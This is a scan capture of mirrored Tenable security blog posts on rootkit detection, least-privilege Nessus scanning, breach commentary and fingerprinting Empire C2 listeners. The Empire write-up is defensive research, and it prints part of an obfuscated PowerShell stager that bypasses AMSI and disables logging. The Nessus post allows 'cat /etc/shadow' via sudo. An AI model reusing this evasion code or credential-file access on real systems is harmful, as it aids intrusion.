tenable38.rssing.com Open in urlscan Pro
185.150.190.192  Public Scan

URL: https://tenable38.rssing.com/chan-8418415/all_p34.html
Submission Tags: falconsandbox
Submission: On January 29 via api from US — Scanned from DE

Form analysis 5 forms found in the DOM

Name: hmsearchGET

<form name="hmsearch" method="get">
  <input type="text" name="q" id="cs-header-menu-search-form-input" placeholder="Type and press enter..." value="" onkeydown="return dogsearch_if13(document.hmsearch.q.value, document.hmsearch.stype.value, event.keyCode);">
  <input type="text" name="dummy" style="visibility:hidden">
  <select name="stype" style="visibility:hidden">
    <option selected="" value="rssing.com">RSSing.com</option>
  </select>
</form>

Name: searchbox_1GET

<form name="searchbox_1" method="get">
  <div class="input-group wrapped-text-input">
    <input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_1.q.value, document.searchbox_1.stype.value,event.keyCode);">
    <div class="input-group-prepend">
      <a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_1.q.value, document.searchbox_1.stype.value);">Search</a>
    </div>
  </div>
  <input type="text" name="dummy" style="display:none">
  <select name="stype" style="display:none">
    <option selected="" value="rssing.com">RSSing.com</option>
  </select>
</form>

Name: searchbox_2GET

<form name="searchbox_2" method="get">
  <div class="input-group wrapped-text-input">
    <input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_2.q.value, document.searchbox_2.stype.value,event.keyCode);">
    <div class="input-group-prepend">
      <a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_2.q.value, document.searchbox_2.stype.value);">Search</a>
    </div>
  </div>
  <input type="text" name="dummy" style="display:none">
  <select name="stype" style="display:none">
    <option selected="" value="rssing.com">RSSing.com</option>
  </select>
</form>

Name: searchbox_3GET

<form name="searchbox_3" method="get">
  <div class="input-group wrapped-text-input">
    <input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_3.q.value, document.searchbox_3.stype.value,event.keyCode);">
    <div class="input-group-prepend">
      <a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_3.q.value, document.searchbox_3.stype.value);">Search</a>
    </div>
  </div>
  <input type="text" name="dummy" style="display:none">
  <select name="stype" style="display:none">
    <option selected="" value="rssing.com">RSSing.com</option>
  </select>
</form>

Name: searchbox_4GET

<form name="searchbox_4" method="get">
  <div class="input-group wrapped-text-input">
    <input type="text" name="q" placeholder="search RSSing.com...." value="" onkeydown="return dogsearch_if13(document.searchbox_4.q.value, document.searchbox_4.stype.value,event.keyCode);">
    <div class="input-group-prepend">
      <a class="cs-btn cs-btn-medium " href="javascript:;" onclick="dogsearch(document.searchbox_4.q.value, document.searchbox_4.stype.value);">Search</a>
    </div>
  </div>
  <input type="text" name="dummy" style="display:none">
  <select name="stype" style="display:none">
    <option selected="" value="rssing.com">RSSing.com</option>
  </select>
</form>

Text Content

WE VALUE YOUR PRIVACY

We and our partners store and/or access information on a device, such as cookies
and process personal data, such as unique identifiers and standard information
sent by a device for personalised ads and content, ad and content measurement,
and audience insights, as well as to develop and improve products.
With your permission we and our partners may use precise geolocation data and
identification through device scanning. You may click to consent to our and our
partners’ processing as described above. Alternatively you may click to refuse
to consent or access more detailed information and change your preferences
before consenting.
Please note that some processing of your personal data may not require your
consent, but you have a right to object to such processing. Your preferences
will apply to this website only. You can change your preferences at any time by
returning to this site or visit our privacy policy.
DISAGREEMORE OPTIONSAGREE

 * Login
   * Account
   * Sign Up

 * Home
   * About Us
   * Catalog
 * Search
 * Register RSS
 * Embed RSS
   * FAQ
   * Get Embed Code
   * Example: Default CSS
   * Example: Custom CSS
   * Example: Custom CSS per Embedding
 * Super RSS
   * Usage
   * View Latest
   * Create

 * Contact Us
   * Technical Support
   * Guest Posts/Articles
   * Report Violations
   * Google Warnings
   * Article Removal Requests
   * Channel Removal Requests
   * General Questions
   * DMCA Takedown Notice


 * RSSing>>
   * Collections:
   * RSSing
   * EDA
   * Intel
   * Mesothelioma
   * SAP
   * SEO
 * Latest
   * Articles
   * Channels
   * Super Channels
 * Popular
   * Articles
   * Pages
   * Channels
   * Super Channels
 * Top Rated
   * Articles
   * Pages
   * Channels
   * Super Channels
 * Trending
   * Articles
   * Pages
   * Channels
   * Super Channels


Switch Editions? German Edition (Deutsch)
Cancel
AddThis Sharing Buttons
Share to FacebookFacebookShare to TwitterTwitterShare to PrintPrintShare to
EmailEmailShare to PinterestPinterestShare to GmailGmailShare to
LinkedInLinkedInShare to Email AppEmail AppShare to TumblrTumblrShare to
MoreAddThis






English
RSSing.com
RSSing>> Latest Popular Top Rated Trending
Channel: Tenable Blog

SUBSCRIBE Remove ADS

NSFW?
Claim

0


Mark channel Not-Safe-For-Work? cancel confirm NSFW Votes: (0 votes)
Are you the publisher? Claim or contact us about this channel.
No ratings yet.
Showing article 661 to 680 of 1364 in channel 8418415
Channel Details:
 * Title: Tenable Blog
 * Channel Number: 8418415
 * Language: eng
 * Registered On: February 27, 2013, 4:19 am
 * Number of Articles: 1364
 * Latest Snapshot: January 19, 2022, 1:01 pm
 * RSS URL: http://feeds.feedburner.com/tenable/qaxl
 * Publisher: https://www.tenable.com/
 * Description:
 * Catalog: //tenable38.rssing.com/catalog.php?indx=8418415

Viewing all 1364 articles
First Page ... Page 32 Page 33 Page 34 Page 35 Page 36 ... Last Page
Browse latest View live




MR. ROBOT CLEANING HOUSE AT E-CORP

October 27, 2017, 6:00 am
Next Configuring Least Privilege SSH scans with Nessus
Previous Reaper IoT Botnet
0
0
Image may be NSFW.
Clik here to view.

The second episode of Mr. Robot finds Elliot starting his new job at E-Corp. As
he joins his new team and is looking to find a way to delay the shipment of all
the paper data to New York facility, Elliott runs into the normal corporate
middle management delays. He quickly realizes his first obstacle, William the
Technology Manager, is up to no good and is deploying Rootkits on phones and
selling the personal data collected. To circumvent this first obstacle, Elliot
breaks out a good tool called theHarvester, and then promptly calls the feds.
Watch out Evil Corp, Elliot is cleaning house, while trying to delay the stage
two attack.


THEHARVESTER

During a pentest, the security professionals go through a reconnaissance phase
where data on the target is collected. Having used theHarvester a few times
myself, I found that time spent collecting subdomains, email and SHODAN results
helps to really understand vantage points into the target for exploitation. In
 this episode, Elliot uses the tail command to view the results of theHarvester
and get his manager's password. He reads the email and identifies that his
manager is using rootkits on the mobile devices. Elliot promptly notifies the
feds. E-Corp may not be Evil for long.

Image may be NSFW.
Clik here to view.


ROOTKITS

Rootkits on mobile devices, laptops, servers and other types of assets are often
hidden very well within the OS, thus making their discovery challenging, to say
the least. Tenable.io™ has very advanced technology developed in a series of
plugins to detect Malicious Processes, Malicious Content, Malicious File
Detection and support for Yara. By using the plugins and Yara rules shown below,
you can search your network for the rootkits or other malicious software.

 * 52670|Web Site Links to Malicious Content
 * 59275|Malicious Process Detection
 * 59641|Malicious Process Detection: Potentially Unwanted Software
 * 64687|Malicious Process Detection: APT1 Software Running
 * 64788|Malicious Process Detection: Malware Signed By Stolen Bit9 Certificate
 * 65548|Malicious Process Detection: User Defined Malware Running
 * 71024|Web Site Hosting Malicious Binaries
 * 71261|Linux Malicious Process Detection
 * 71263|Mac OS X Malicious Process Detection
 * 88958|Malicious File Detection: APT1 Software on System
 * 88959|Malicious File Detection: Malware Signed By Stolen Bit9 Certificate
 * 88960|Malicious File Detection: Invalid Directories
 * 88961|Malicious File Detection
 * 88962|Malicious File Detection: User Defined Malware
 * 88963|Malicious File Detection: Potentially Unwanted Software
 * 91223|Malicious Process Detection: User Defined Malware Running (Linux)
 * 91224|Malicious Process Detection: User Defined Malware Running (Mac OS X)
 * 91990|Malicious File Detection Using Yara

By searching for three terms “Malicious File, Malicious Process, and Hosting
Malicious,” you can easily locate all the plugins which provide indications of
rootkits in your network.  

Image may be NSFW.
Clik here to view.

In my test data, you can see I have one system I need to investigate. The
plugins will return files and URLs to help you better understand and defend
against the malware or rootkit.  

Image may be NSFW.
Clik here to view.


MODERN ATTACK SURFACE

The detection of rootkits was difficult when confined to managed devices, but
now that the modern IT landscape consists of web apps, containers, cloud
instances and IoT, the ability to detect rootlets becomes even more challenging.
Tenable.io is the first Cyber Exposure platform to provide you with holistic
visibility across your modern attack surface, allowing you to detect rootkits or
other malicious software on your network. Start a free 60-day trial of
Tenable.io for your organization today.

Image may be NSFW.
Clik here to view.

Search
RSSing.com

--------------------------------------------------------------------------------







CONFIGURING LEAST PRIVILEGE SSH SCANS WITH NESSUS

October 30, 2017, 6:43 am
Next The Equifax Breach – A Cyber WTF Moment
Previous Mr. Robot Cleaning House at E-Corp
0
0
Image may be NSFW.
Clik here to view.

Credentialed scans have long been advocated as the quickest and most accurate
way to perform a vulnerability assessment against any network. But like with all
things technology, it runs into two usual roadblocks: people and processes.

When the topic of credentialed network scans is discussed it inevitably leads to
questions such as, who is requesting access and why? What level of privileges is
needed and why? Which commands will be run and why? All legitimate questions
which should be rightly asked before granting access to any system. But the
back-and-forth between different teams typically leads to a long, drawn-out
process eventually resulting in either the requestor being denied access or
getting access to a limited account which may lead to incomplete scan results.

To help solve this problem, our customers have asked us to provide transparency
around which commands are run by a Nessus® scan, what privileges are required to
run the commands and if the commands failed, which Nessus plugins would fail as
a result. An additional requirement was to provide this information in an
easy-to-consume output format so that they can configure a scan account while
having the least privileges and still be able to perform a complete and accurate
scan.

With the recent release of Nessus 6.11, we are taking steps to address that
issue by releasing a beta feature which will allow our customers to do just that
across Tenable.io™ Vulnerability Management, Nessus and Security Center™.


REQUIREMENTS

 * Nessus 6.11 or later, either standalone or managed by Tenable.io
   Vulnerability Management or Security Center
 * Scan Target Operating System
    * CentOS, Redhat, Amazon Linux, SuSE, Ubuntu, Debian, HP-UX, Scientific
      Linux, AIX, Oracle Linux, Gentoo.


SCAN CONFIGURATION

At a high level, the process can be summarized in five simple steps :

 1. Configure a scan account to run with sudo privileges
 2. Enable ‘Attempt Least Privilege’ preference in scan policy
 3. Review plugin output of Nessus plugin IDs #102094 and #102095
 4. Update /etc/sudoers file based on results on plugin #102094
 5. Repeat Step 4, until commands which run with higher privileges are accounted
    in /etc/sudoers file


STEP 1 : CONFIGURE USER TO RUN COMMANDS VIA SUDO

Log in to the system as the root user and create a normal user account. Run
visudo to edit the /etc/sudoers file, and add the commands the user is allowed
to run with sudo. In the example below I created a user ‘nessus_scan_account’
assigned it SUDOER User_Alias who can run the ‘/usr/bin/dmidecode’ command which
requires root privileges to run.

Image may be NSFW.
Clik here to view.


STEP 2. ENABLE ‘ATTEMPT LEAST PRIVILEGE’ CHECKBOX IN SCAN POLICY

Follow the below steps to enable ‘‘Attempt Least Privilege’ preference in the
scan policy.

Tenable.io Vulnerability Management & Nessus

Click Scans -> New Scan -> Advanced Scan -> Credentials -> SSH -> Attempt Least
Privilege

When this preference is enabled, Nessus plugins attempt to execute commands with
least privileges (i.e. without privilege escalation), and if the initial attempt
fails, it retries executing the command with privilege escalation. It also logs
commands which failed and succeeded with privilege escalation and reports the
information in two plugins (#102094, #102095) which will be discussed in the
next steps. As a result of running the same command twice, customers should note
the scans could run 10-30 percent slower according to our lab tests.

Image may be NSFW.
Clik here to view.

Security Center

For Security Center, follow the below screens to enable the preference.

Click Scans -> Policies -> Add -> Advanced Scan -> Authentication -> Attempt
Least Privilege

Image may be NSFW.
Clik here to view.


STEP 3 : REVIEW PLUGIN OUTPUTS

Once the scan finishes, review output of plugins #102094 and #102095 to
determine which plugins successfully ran with privilege escalation and which
plugins failed due to insufficient privileges.


SSH COMMANDS RAN WITH PRIVILEGE ESCALATION (#102095)

Plugin #102095 reports all plugins which ran with escalated privileges. The
plugin output is in YAML, and includes information about the account used,
plugin file name, id, name and the command it ran. This plugin will help users
verify only authorized commands are run with sudo privileges.

Image may be NSFW.
Clik here to view.


SSH COMMANDS REQUIRE PRIVILEGE ESCALATION (#102094)

Plugin #102094 reports all plugins which failed to run with escalated privileges
due to insufficient privileges. As was the case in the previous plugin, the
plugin output is in YAML to facilitate easier creation of /etc/sudoers file. It
includes information about the account used, plugin file name, id, name, and the
command it ran.

Customers should review the output of this plugin to fine tune the commands
which can be run with the sudo account. Note the command ‘cat /etc/shadow’
failed in the below example. We will resolve this issue in the next step.

Image may be NSFW.
Clik here to view.


STEP 4 : UPDATE /ETC/SUDOERS FILE

In the previous step, plugin #102094 reported execution of command ‘cat
/etc/shadow’ failed due to privilege escalation failure. We can easily resolve
this by adding ‘/bin/cat /etc/shadow’ as an allowed command to the SUDOER alias
we created earlier in /etc/sudoer file, which will allow the next scan to run
this command successfully with escalated privileges. You could also continue to
block certain privileged commands from running by not updating the /etc/sudoers
file and accepting the risk of certain vulnerabilities not being detected due to
incomplete information.

Image may be NSFW.
Clik here to view.


STEP 5 : REPEAT

To perform an accurate authenticated scan, repeat step four such that commands
that fail are accounted in the /etc/sudoers file.  

At this point, one might wonder, “Why not just share a static list of ssh
commands with customers?” The reason is two-fold. First, we routinely add new
commands to our plugins, so there is a risk of a static file going stale. And
second, we don’t always know if a command will require admin privileges across a
wide variety of operating systems.


WRAP-UP

In this blog post, we demonstrated how a user can create a tailored Nessus scan
account to perform authenticated scans over SSH with the least privileges
required to perform the scan. Currently, the feature is supported on a limited
number of OSs, and we expect to roll out support for additional OSs over the
next few months. If you have feedback about the feature, please reach out to
Tenable™ support. We would love to hear from you.

Image may be NSFW.
Clik here to view.





THE EQUIFAX BREACH – A CYBER WTF MOMENT

October 30, 2017, 10:08 am
Next The Year of the Modern Attack Surface
Previous Configuring Least Privilege SSH scans with Nessus
0
0
Image may be NSFW.
Clik here to view.

Now that some time has passed since the news broke on the Equifax breach, we’ve
had some time to ascertain the facts, digest what happened and draw some
conclusions.  It’s taken some time as for the first few weeks the company slowly
doled out bits and pieces of information.  

For starters,  it is not even remotely acceptable for a CEO of a tech company,
an information company, or any other company leveraging technology to be
clueless about his organization’s cyber exposure and technology risk.  Former
Equifax CEO Richard Smith’s statement before Congress about the catastrophic
breach affecting 145 million Americans was dumbfounding. The company’s
willingness to blame the breach on a single engineer not acting quickly enough
to patch a known vulnerability can only be characterized as a total face-palm
moment. In fact, the whole Equifax explanation is such a long series of
face-palm moments that I now have a migraine.

Cyber 101 teaches us that security requires people, process and technology.

I won’t comment on the people side of this incident, since I don’t know them
personally.  

There are clearly a series of technology failures.  How did they operate with a
vulnerability scanner that they didn’t know was incapable of detecting these
highly publicized critical vulnerabilities? How did they not have the technology
to detect the incident between May 13th and July 30th, allowing 79 days of
active exfiltration of so much data?

And how do you implement processes where the entire cyber infrastructure of
Equifax and securing access to all of this incredibly sensitive information
about hundreds of millions of people boil down to one person?  In what world
does this seem like a reasonable standard of care??  

Why did the breach response process take so long? And why was their process so
poorly understood and coordinated across the executive team that doing the right
thing became effectively impossible? The company’s leadership not only showed a
blatant disregard for the securing the information they were responsible for
stewarding, they displayed a foundational lack of moral compass burying deep
within the fine print that potential breach victims were waiving their legal
rights to sue in exchange for finding out if their data was exposed and then
offering free identity theft protection that actually isn’t free after a year.

You don’t have to be a genius to realize that the cyber world is a nasty place.
Using technology of any kind isn’t risk-free. All organizations and their
leaders have a responsibility to understand what systems they rely on, where
they are exposed, and have plans for actively managing their risk.  Breaches
will happen, even to good security programs and organizations that are going the
extra mile to protect themselves, their customers and the information they are
entrusted with stewarding.

Equifax just wasn’t one of those cases, not by a long mile.

 

Image may be NSFW.
Clik here to view.





THE YEAR OF THE MODERN ATTACK SURFACE

November 6, 2017, 11:41 am
Next Hiding Behind the APT Helplessness Defense...Really?
Previous The Equifax Breach – A Cyber WTF Moment
0
0
Image may be NSFW.
Clik here to view.

If there’s one thing 2017 has taught us so far, it’s that the attack surface has
changed. Cloud, containers, custom web apps, IoT, and OT are all part of the
milieu that’s forcing security teams to up their game.

Basic cyber hygiene is more important yet more challenging than ever. Consider
four of the year’s biggest security headlines:

 * NotPetya– an aggressive worm using multiple exploits that
   delivered destructionware encrypting the target’s data without the
   possibility of recovery; NotPetya generated over $200 million in damage per
   company to Merck, FedEx (TNT Express), Maersk, and possibly others
 * Equifax– a catastrophic breach that compromised the sensitive personal
   information of more than 100 million people, enabled by a known vulnerability
   in the Apache Struts web application framework
 * OT / ICS threats– an unprecedented series of recent threats to OT
   infrastructure, including CrashOverride/Industroyer and the October 2017
   DHS/FBI alert on an APT campaign targeting energy and other critical
   infrastructure
 * Reaper– a potentially massive new IoT botnet that’s one of the first to
   exploit vulnerabilities in device firmware rather than brute-forcing
   passwords, with the number of affected devices perhaps as large as one
   million

If 2015 was the year of the endpoint, recent attacks make clear that 2017 is the
year of the modern attack surface. The wave of highly publicized breaches from
2013-2015, including Target, Home Depot, Anthem, and OPM, all targeted the
endpoint. But unlike the attacks of yesterday, the headlines of today involve
attacks against today's modern attack surface: cloud, web applications, IoT,
critical infrastructure, and more.

Securing the endpoint, while necessary, is no longer enough. The attack surface
has expanded.

Server and endpoint hardening, operational technology (OT) asset and
vulnerability detection, IoT discovery and hardening, container and web app
vulnerability identification and mitigation – these are all table stakes for
effectively managing cyber exposure. Attackers will always find the weak link,
so understanding and protecting what matters most across your entire attack
surface is essential.

It’s no different than managing basic physical security in your home. You
wouldn’t lock just the front windows in your house and ignore those in the back.
Locking every first-floor window and door when you leave home is minimum
acceptable security. Similarly, security teams require continuous visibility,
context, and insight into all assets. Focusing on server infrastructure leaves
blind spots in the cloud and containers. Focusing on endpoints leaves one
vulnerable to web app and IoT attacks. Focusing on IoT leaves the whole rest of
the environment a question mark. 

And even seeing all your assets isn’t enough. Just as a police department must
distinguish between petty vandalism, a home invasion, and a riot when triaging
calls, security teams must understand which vulnerabilities and issues actually
create the most cyber risk for their business. Speed of visibility is helpful,
but without broader context and prioritization it’s useless. Imagine the police
treating graffiti as an urgent threat and racing through town with sirens
blaring. No security team wants to waste their time by racing mindlessly ahead.

Although we don’t know every detail of the Equifax breach, public reporting
suggests it was a disastrous example of poor vulnerability prioritization and
risk management. The company knew the Struts vulnerability existed in its web
apps, but for whatever reasons it didn’t act quickly or effectively enough to
protect the immensely sensitive data accessible through those apps. This is
exactly why full attack surface visibility and risk-based prioritization are
essential for managing cyber exposure.

Regulatory compliance and policy reporting are another reason security teams
need complete visibility and insight across assets. Security and compliance
teams often need to demonstrate compliance with PCI, HIPAA, CIS Critical
Security Controls, NIST CSF, ISO/IEC 27001/27001, or any number of other
frameworks. Without visibility into the entire computing environment, this is
often impossible or at best highly manual.

It’s not too late to avoid the next NotPetya or Equifax, but it means getting
serious about understanding your full environment – with all its dark corners,
unmanaged assets, and forgotten systems. Turning a blind eye or focusing on
silos won’t keep you safe.

Image may be NSFW.
Clik here to view.





HIDING BEHIND THE APT HELPLESSNESS DEFENSE...REALLY?

November 13, 2017, 5:39 am
Next Identifying Empire HTTP Listeners
Previous The Year of the Modern Attack Surface
0
0
Image may be NSFW.
Clik here to view.

Former Equifax CEO Richard Smith’s Congressional Testimony was a real WTF moment
for many of us who work in the cyber field. Last week, former Yahoo CEO Marissa
Mayer testified about Yahoo’s 2013 and 2014 data breaches, leaving us with
intentionally vague, if not misleading statements. Mayer asserted that in both
of the breaches,“Russian Intelligence Officers and state-sponsored hackers were
responsible for highly complex and sophisticated attacks on Yahoo’s systems.”
What we haven’t seen in Yahoo’s case is any further detailing of what these
"sophisticated attacks" actually looked like.

In cyber, details matter A LOT. We do forensic analysis and read through
numerous incident reports, gaining knowledge, identifying patterns and trying to
step up our game. We know that all threat actors, including government
intelligence services, cyber criminals, and hacktivists, readily use common
exploits and phishing techniques whenever possible. Why? Because among other
reasons, they're readily available at no cost and make attack attribution
harder.

In a vast supermajority of breaches, the victims were ultimately compromised by
the seemingly simple things. Equifax’s catastrophic breach occurred because they
failed to identify and patch a known vulnerability in their Apache Struts
implementation for which updates and workarounds were available. After one
quarter, they claim the incident has cost the company over $75M. On the last
earnings call, Merck’s CFO announced that Petya, which leveraged a known
vulnerability with readily available patches and workarounds, resulted in $135M
of lost revenue and $175M in additional cost. Home Depot, Target -- the list
goes on and on.

When breaches occur, we -- shareholders, customers, citizens, lawmakers -- start
looking for answers. It seems that many leaders are happy to claim that “an APT
did it” and “how are we supposed to protect ourselves from nation-state
adversaries?” These are perfect examples of learned or at least misleading
helplessness. We know perfect security doesn’t exist. What we are seeing,
however, is far from that -- organizations falling victim to simple exploits,
not sophisticated, super-advanced hacking techniques. Let’s be clear, state
actors may be behind an attack, but they're taking full advantage of
lackadaisical security practices to get in. The questions Congress should and
ultimately the courts will be asking ought to be less focused on who the
attackers were and more on how they got in. Were these organizations exercising
a reasonable standard of care in protecting themselves? Verizon, for example,
since the acquisition appears to be stepping up Yahoo's security posture.

The questions Congress should and ultimately the courts will be asking ought to
be less focused on who the attackers were and more on how they got in.

We can’t be lulled into a false sense of helplessness based on our worst fears.
When it boils down to it, it’s very rarely the most sophisticated of zero-day
exploits for which very little could have been done that’s tripping us up, it’s
the simple and seemingly easy stuff.

I'm frequently asked what organizations can do to protect themselves from APTs.
The first step is obvious -- do the basics really, really well. Know where you
have systems, and which ones you rely on. Know where they are exposed and
exercise good cyber hygiene practices in maintaining them. Use multi-factor
authentication pervasively and make sure tight controls are in place to manage
privileged accounts. Use any number of modern techniques to monitor for
intrusions. Doing the cyber basics well might not be sexy, but it is
foundational to defend against APTs and it makes a huge difference.

Good cyber hygiene makes a difference and is ultimately the reason why
organizations that run tight ships suffer far fewer intrusions, including fewer
intrusions from advanced threat actors.

Image may be NSFW.
Clik here to view.







IDENTIFYING EMPIRE HTTP LISTENERS

November 21, 2017, 10:06 am
Next The Bad, the Ugly and the Cyber Immoral - Thank you, Uber
Previous Hiding Behind the APT Helplessness Defense...Really?
0
0

Empire is a popular open source post-exploitation framework. The framework can
very roughly be broken down into two parts: agents and listeners. An agent is an
implant that lives on the victim’s computer. A listener resides on the
attacker’s command and control server and handles communication with the agent.
A lot of work has gone into making agents difficult to find. Less has been done
to hide listeners. In this write up, I point out mistakes that have been made in
Empire’s HTTP listeners and then look at some listeners found in the wild.

Empire has five different HTTP-based listeners. From a network point of view,
they’re similar in that a request to “/” results in a 404 Not Found error.

albinolobster@ubuntu:~$ curl -i http://192.168.1.204/

HTTP/1.0 404 NOT FOUND

Content-Type: text/html

Content-Length: 233

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0

Server: Microsoft-IIS/7.5

Date: Thu, 16 Nov 2017 21:36:21 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<title>404 Not Found</title>

<h1>Not Found</h1>

<p>The requested URL was not found on the server. If you entered the URL
manually please check your spelling and try again.</p>

Perhaps that response doesn’t look interesting, but it’s enough to fingerprint
an Empire HTTP listener.


CREATING THE SHODAN FILTER

One of the important things to know about Empire is that it’s built on top of
Flask. Flask uses Werkzeug for some of its HTTP functionality. Empire’s
dependency on Werkzeug is immediately evident in the HTTP response because the
error message, “The requested URL was not found on the server. If you entered
the URL manually please check your spelling and try again” is hardcoded in
Werkzeug.

Punching the query title:”404 Not Found” +”Server:Wekzeug” into Shodan shows
that Werkzeug very reliably serves a 404 page that is 233 bytes. This gives us a
great starting point for finding Empire listeners on Shodan: title:"404 Not
Found" +"Content-Length: 233" yields ~24,000 entries. We can’t use the Server
field in the HTTP response because Empire allows the user to modify it.

Another important detail about Flask and Werkzeug is that they don’t support
HTTP 1.1. You can actually see in the server’s response that it starts by
declaring “HTTP/1.0”. However, Empire’s HTTP response contains a feature
introduced in HTTP 1.1. The Cache-Control field, originally included in RFC
2068, “Hypertext Transfer Protocol -- HTTP/1.1”, was introduced into Empire in a
commit to avoid caching. Empire isn’t the first or last HTTP server to backport
Cache-Control, but it does help us narrow the field a bit. The Shodan filter
title:"404 Not Found" +"Content-Length: 233" +"Cache-Control: no-cache,
no-store, must-revalidate" -"post-check=" -"pre-check=" -"private" has 406
results.

While we’re talking about RFC violations, it should be noted that use of the
Pragma field, also introduced in the caching commit, is not correct. According
to RFC 1945, “Hypertext Transfer Protocol -- HTTP/1.0”, use of no-cache with
Pragma is intended for HTTP requests only. Again, Empire is not the first to
ignore the RFC. In fact, Pragma: no-cache is widely used in HTTP server
responses. RFC be damned. However, Werkzeug doesn’t use it by default so
Empire’s usage helps narrow the field even further: title:"404 Not Found"
+"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate"
-"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" has 306 results.

There is one more RFC violation I want to point out, again from the caching
commit, and that is the use of the Expires field. Both HTTP 1.0 and 1.1 specify
that this field should contain a date. For example: Expires: Thu, 01 Dec 1994
16:00:00 GMT. Empire uses Expires: 0 which both RFCs specifically call out as
incorrect (although 1.0 says 0 should be accepted and 1.1 says it must be
accepted). The Shodan filter title:"404 Not Found" +"Content-Length: 233"
+"Cache-Control: no-cache, no-store, must-revalidate" -"post-check="
-"pre-check=" -"private" +"Pragma: no-cache" +"Expires: 0" has 301 results. It
should also be noted that Microsoft IIS servers generally don’t use Expires: 0.
Which means Empire’s default value of Server: Microsoft-IIS/7.5 isn’t a good
fit.

There is one more field that we know an Empire HTTP listener must have and
that’s the Server field. As previously mentioned, this field is user
configurable so you shouldn’t try to key off of the contents. But simply
requiring the field to be present narrows the results down to 298: title:"404
Not Found" +"Content-Length: 233" +"Cache-Control: no-cache, no-store,
must-revalidate" -"post-check=" -"pre-check=" -"private" +"Pragma: no-cache"
+"Expires: 0" +"Server:".

We have more or less exhausted what we know an Empire HTTP listener response
should contain. Now we need to add to the filter what we know it should not
contain. For example, Empire doesn’t serve up any fields with “X-” or
“Set-Cookie”. My final Shodan filter has 282 results: title:"404 Not Found"
+"Content-Length: 233" +"Cache-Control: no-cache, no-store, must-revalidate"
-"post-check=" -"pre-check=" -"private" +"Pragma: no-cache" +"Expires: 0"
+"Server:" -"X-" -"Set-Cookie:" -"Connection:" -"Etag" -"Last-Modified"
-"Accept-Ranges:" -"Access-Control".


ARE THOSE REALLY EMPIRE LISTENERS?

The logic behind the Shodan filter is fairly sound, but cautious readers should
be asking themselves, “How can you be sure all of the results are Empire
listeners?” You can’t be sure. Obviously, non-Empire servers could have the
exact same HTTP banner. However, there is one more mistake in Empire that will
allow us to confirm if a server is an Empire listener or not.

At the beginning of this write up, I made an HTTP request to “/” which resulted
in a 404 error response. This is because Empire hasn’t implemented a route for
“/”. However, Empire has implemented a route for literally everything else. For
example, the following request yields a 200 OK:

albinolobster@ubuntu:~$ curl -I http://192.168.1.204/theyregooddogsbrent

HTTP/1.0 200 OK

Content-Type: text/html; charset=utf-8

Content-Length: 173

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0

Server: Microsoft-IIS/7.5

Date: Fri, 17 Nov 2017 14:03:20 GMT

On a normal server, “/” often maps to index.html, index.php, index.asp, etc. So
it’s pretty odd if you request “/” and get a 404 but request “/index.html” and
get a 200. Not only that, but the HTTP content for most 200 OKs is hardcoded in
Empire. Using this knowledge we can verify, with very little doubt, that a
server is an Empire listener.

albinolobster@ubuntu:~$ curl -I http://192.168.1.204/

HTTP/1.0 404 NOT FOUND

Content-Type: text/html

Content-Length: 233

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0

Server: Microsoft-IIS/7.5

Date: Fri, 17 Nov 2017 14:24:06 GMT


albinolobster@ubuntu:~$ curl -i http://192.168.1.204/index.html

HTTP/1.0 200 OK

Content-Type: text/html; charset=utf-8

Content-Length: 173

Cache-Control: no-cache, no-store, must-revalidate

Pragma: no-cache

Expires: 0

Server: Microsoft-IIS/7.5

Date: Fri, 17 Nov 2017 14:24:19 GMT


<html><body><h1>It works!</h1><p>This is the default web page for this
server.</p><p>The web server software is running but no content has been added,
yet.</p></body></html>


EMPIRE IN THE WILD

The Shodan filter seems to be quite accurate. Of the 282 servers listed on
Shodan, I only counted one false positive and one I wasn’t sure about among the
servers that are still reachable. I did find that some servers don’t serve up
the default page for index.html. For example, the following is part of the
Empire powershell stager implementation.

albinolobster@ubuntu:~$ curl http://xx.xx.xx.xx:8080/index.html

IF($PSVErsionTAble.PSVeRSiOn.MAjoR -Ge
3){$GPS=[rEf].AssEmBlY.GEtTYPe('System.Management.Automation.Utils')."GEtFiE`ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GETVaLUE($NUll);If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}Else{[SCRIptBlocK]."GetFIe`ld"('signatures','N'+'onPublic,Static').SETVAlue($NULL,(NEW-ObJeCt
CoLlECtionS.GeNeRIC.HashSet[striNG]))}[ReF].AssEmbLY.GEtTYPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFiELd('amsiInitFailed','NonPublic,Static').SEtVaLUE($nuLL,$tRUE)};};[SYSteM.NET.SErvICePOIntManaGER]::EXpeCT100ContINUe=0;$WC=New-ObJEcT
SYstem.NET.WEBClIENT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0;
rv:11.0) like
Gecko';$Wc.HEAdErs.AdD('User-Agent',$u);$WC.ProxY=[SYsteM.NET.WebRequeSt]::DefauLtWebPRoxy;$WC.PRoxY.CreDeNTIAlS
= [SysteM.NET.CrEdenTiAlCaChE]::DEfaULtNEtWorkCredEnTiAls;$Script:Proxy =
